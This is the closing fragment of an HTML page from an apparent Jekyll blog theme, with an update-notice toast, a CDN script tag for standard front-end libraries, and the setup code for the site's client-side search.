  <div class="toast-body text-center pt-0">
    <p class="px-2 mb-3">A new version of content is available.</p>
    <button type="button" class="btn btn-primary" aria-label="Update">
      Update
    </button>
  </div>
</aside>

    

    <!-- JavaScripts -->

    <!-- JS selector for site. -->

<!-- commons -->



<!-- layout specified -->




  

  
    <!-- image lazy-loading & popup & clipboard -->
    
  















  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  



  <script src="https://cdn.jsdelivr.net/combine/npm/jquery@3.7.1/dist/jquery.min.js,npm/bootstrap@5.3.2/dist/js/bootstrap.bundle.min.js,npm/simple-jekyll-search@1.10.0/dest/simple-jekyll-search.min.js,npm/loading-attribute-polyfill@2.1.1/dist/loading-attribute-polyfill.umd.min.js,npm/magnific-popup@1.1.0/dist/jquery.magnific-popup.min.js,npm/clipboard@2.0.11/dist/clipboard.min.js,npm/dayjs@1.11.10/dayjs.min.js,npm/dayjs@1.11.10/locale/en.min.js,npm/dayjs@1.11.10/plugin/relativeTime.min.js,npm/dayjs@1.11.10/plugin/localizedFormat.min.js,npm/tocbot@4.25.0/dist/tocbot.min.js"></script>






<script defer src="/assets/js/dist/post.min.js"></script>






    

    <!--
  Jekyll Simple Search loader
  See: <https://github.com/christian-fei/Simple-Jekyll-Search>
-->





<script>
  /* Note: dependent library will be loaded in `js-selector.html` */
  SimpleJekyllSearch({
    searchInput: document.getElementById('search-input'),
    resultsContainer: document.getElementById('search-results'),
    json: '/assets/js/data/search.json',
    searchResultTemplate: '  <article class="px-1 px-sm-2 px-lg-4 px-xl-0">    <header>      <h2><a href="{url}">{title}</a></h2>      <div class="post-meta d-flex flex-column flex-sm-row text-muted mt-1 mb-1">        {categories}        {tags}      </div>    </header>    <p>{snippet}</p>  </article>',
    noResultsText: '<p class="mt-5"></p>',
    templateMiddleware: function(prop, value, template) {
      if (prop === 'categories') {
        if (value === '') {
          return `${value}`;
        } else {
          return `<div class="me-sm-4"><i class="far fa-folder fa-fw"></i>${value}</div>`;
        }
      }

      if (prop === 'tags') {
        if (value === '') {
          return `${value}`;
        } else {
          return `<div><i class="fa fa-tag fa-fw"></i>${value}</div>`;
        }
      }
    }
  });
</script>

  </body>
</html>

